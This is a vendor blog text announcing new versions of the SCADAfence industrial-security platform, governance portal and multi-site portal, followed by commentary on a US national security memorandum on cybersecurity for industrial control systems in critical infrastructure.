We launched the SCADAfence Platform 6.6, Governance Portal 2.0 and the Multi-Site Portal 2.6. We launched these new product versions to ensure that we offer the industry’s leading industrial cybersecurity products that provide the best detection & response capabilities in large-scale OT networks, asset discovery and governance. Some of the new features include the MITRE ATT&CK framework for ICS support, we’ve included many new security alerts, improved our state-of-the-art technology, enhanced reporting, new zero trust capabilities and more.

With the combination of our additional new funding, hiring top experts in R&D & the executive team, 2021 has truly been an amazing year for SCADAfence. We have strengthened our leading OT security offering to provide the most advanced and cutting-edge technology in the OT security industry.

After months of excessive testing by internal & external research teams, The SCADAfence Platform version 6.6 consistently demonstrated best-in-class performance and provided 100% detection with close to zero false positives.

Current customers can upgrade their SCADAfence Platform to the latest version and see the new features in action. But let’s take a closer look at the main new features, with some screenshots.

Designed for our users, by our users

After talking to our rapidly expanding customer base and asking how we can make their user experience as efficient as possible, it was time for a further optimized UI design. We’ve updated All our product’s user interface with a smoother and sleeker feel, that was designed with ease of use in mind, based on customer feedback.

Our new UI will allow our customers and their OT security teams to easily manage their OT environments while navigating through the platform.

Diagram 01. The SCADAfence Platform’s Assets Manager dashboard

The ‘Einstein’ Baseline

We’ve always prided ourselves in having the most advanced baseline technology in the industry, with over 40% more accuracy than other solutions in the OT security market. According to Gartner’s Vam Voster, “ SCADAfence’s self-tuning baseline minimizes false positives; this means that no user configuration is required, nor is any stop-and-restart needed to relearn. This system allows for a scalable solution for a huge organization and seamless integration with OT networks.”

With the SCADAfence Platform, our customer’s baseline period takes just 2 days, unlike our competitors who tend to take up to six weeks. On top of the baseline period, we wanted to make our industry-leading baseline even more advanced and accurate, so we are excited to introduce our new ‘Einstein’ baseline.

Unlike other OT security solutions, SCADAfence’s new ‘Einstein’ baseline continuously updates and learns more about the latest network traffic and will “forget” old and irrelevant behavior that is not relevant to the customer’s environments and systems. This results in detecting new malicious behavior which increases the visibility into networks, even if in the first phase they were infected or compromised.

In addition, changes in network behavior might occur due to changes in process or network equipment. This also requires an adaptation of the baseline.

This is a major improvement in the accuracy of the detection, and coping with dynamic networks.

New System Mode – Offline PCAP Analysis

SCADAfence’s customers and partners can now run PCAP analysis for offline risk assessment processes. The offline analysis will allow customers and partners to test and analyze their traffic files taken from their network and analyzed offline. This analysis enables users to get a better understanding of their network traffic while not affecting their current network. This feature has been uniquely designed to provide completely offline analysis without interference from live network traffic.

Governance 2.0

The SCADAfence Platform release 6.6 is equipped with our latest version of our  IT/OT Governance and compliance portal. After receiving continuous feedback from our customers and dozens of deployments of our Governance portal we updated our industry-leading governance portal.  In addition to a complete UI facelift, the new Governance Portal version 2.0, has more speed, more advanced results and more compliance regulations. In fact, we’ve added nine (9) new compliance frameworks to fit our customers’ growing compliance needs.

Diagram 02. The SCADAfence Governance Dashboard

Scaling with SCADAfence’s Multi-Site Version 2.6

SCADAfences’s customer deployments are growing to where they are reaching hundreds of sites. This poses a significant burden for most administrators to configure each site’s settings individually. With SCADAfence Multi-Sites’ Portal Central Configuration, this is no longer an issue.

Diagram 03. The SCADAfence Multi-Site Dashboard

The Multi-Site Portal now allows customers to distribute their configurations to all their sites from the Multi-Site Portal to the distributed SCADAfence Platforms. The security configuration is managed via profiles and covers many security aspects including alerts policy, IP groups, central licensing, 3rd Party tools integrations and more.

By deploying the central configuration, administrators will now save more time while increasing productivity and efficiency while using the SCADAfence Platform in their multiple sites.

Central Software Updates

As part of the central configuration capabilities, SCADAfence customers now have the opportunity to update the SCADAfence Platform software from the Multi-Site Portal. This new feature allows customers to upgrade their SCADAfence Platforms with the latest version in all their sites centrally from the Multi-Site Portal, without the need to access each site’s Platform and upgrade it manually.

This allows organizations and their administrators the flexibility to increase the management of their sites and the OT networks, which results in productivity and saving time.

Sprinting Into 2022

This latest product release had a strong emphasis on user experience, security and improving the management of different industrial protocols (ENIP/CIP, S7, BACnet, etc.). In conclusion, the SCADAfence Platform version 6.6 enables organizations in manufacturing, critical infrastructures and more industrial sectors to operate securely, reliably and efficiently with the right amount of OT security within their industrial environments.

We’re confident that these updates and those coming in the future will bring a better experience for users and we are here to help with all your OT security needs.

In the wake of the different ransomware attacks on Colonial Pipeline, JBS Foods, Oldsmar Florida water system and other critical infrastructure, President Joe Biden signed a national security memorandum that is aimed to strengthen the cybersecurity for critical infrastructures. The goal of this memorandum is to establish improved information sharing and collaboration initiatives with the private sector. Additionally, the White House wants to raise the security of ICS and address the different security risks and vulnerabilities in critical infrastructure environments.

The National Security Memorandum on Improving Cybersecurity for Critical Infrastructure Control Systems formalizes the Industrial Control System (ICS) Cybersecurity Initiative which directs the Departments of Homeland Security and Commerce and the Department of Commerce’s National Institute of Standards and Technology (NIST) to create and issue cybersecurity performance goals for critical infrastructures.

The new initiative of collaboration between the federal government and the critical infrastructure sector will work together to defend the critical infrastructures of the United States. “Encouraging and facilitating the deployment of technologies and systems that provide threat visibility, indications, detection, and warnings, and that facilitate response capabilities for cybersecurity in essential control system and operational technology networks,” according to the memorandum.

Additionally, the memorandum will increase the adoption of cyber security solutions that provide better visibility into ICS, “The goal of the Initiative is to greatly expand deployment of these technologies across priority critical infrastructure.”

Another objective of this incentive to strengthen the security of ICS is to deploy interconnected industrial sensor technology. By deploying sensors, critical infrastructure environments will enhance their visibility into security events in their operational systems.

This will allow organizations to detect any intrusion on their network more quickly. As quoted in the memorandum, “We cannot address threats we cannot see; therefore, deploying technologies that can monitor control systems and detect malicious activity and facilitate response actions to cyber threats is central to ensuring the safe operations of these critical systems.”

Why The Industrial Control Systems Cybersecurity Initiative Matters

Following in the lines of the Biden Administration’s recent cyber security executive order, the memorandum establishes the Industrial Control Systems Cybersecurity Initiative (the “ICS Initiative”). The ICS Initiative is a collaborative effort between the Federal Government and the critical infrastructure community to improve the cybersecurity of systems supporting national critical functions.

This new initiative is important for the critical infrastructure sector as it encourages, facilitates and scales the deployment of ICS security technologies to monitor and detect malicious activity and provide the right mitigation steps in response to cyber attacks. By using the ICS Initiative as guidance, the Federal Government will collaborate with the industrial sectors to share different cyber threat information for ICS systems of critical infrastructures.

Initially, this initiative was launched in April 2021 with a pilot effort within the electricity subsector with over 150 electricity utilities representing almost 90 million customers agreeing to deploy control system cybers security technologies. The same effort is underway with the natural gas pipelines sector which will be followed by water and wastewater, chemical and other sectors later this year.

Critical Infrastructure Cybersecurity Performance Goals

The Memorandum also directs the need for government agencies to create and issue baseline cybersecurity goals across the critical infrastructure sectors. The need for improved security controls will be dependent on the control systems in the critical infrastructure environments.

These measures will “further a common understanding of the baseline security practices that critical infrastructure owners and operators should follow to protect national and economic security, as well as public health and safety,” according to the memorandum.

NIST and CISA will establish the preliminary goals for control systems for critical infrastructures sectors by Sept. 22, 2021. Then the final cross-sector control systems goals will be published by July 28, 2022.

“These performance goals should serve as clear guidance to owners and operators about cybersecurity practices and postures that the American people can trust and should expect for such essential services,” the memorandum states.

Moving Forward

ICS security is not an easy task at hand and defending the wide range of industrial networks and facilities is often neglected or not enough resources are allocated. By creating a voluntary collaboration of infrastructures operators and the cyber security agencies of the government it will strengthen the awareness of the different attacks on critical infrastructures.

The US government putting a strong emphasis on visibility is a smart move. The research and deployment of cyber security for ICS are only now starting to change for the better. The legacy systems are finally converging between the physical and the interconnected networks. By becoming interconnected to the Internet it has created new security risks for the critical infrastructures sectors that haven’t been properly evaluated. The memorandum is a good first step into ensuring better security for ICS, but it’s only one small step on a long road to more secure critical infrastructure sectors.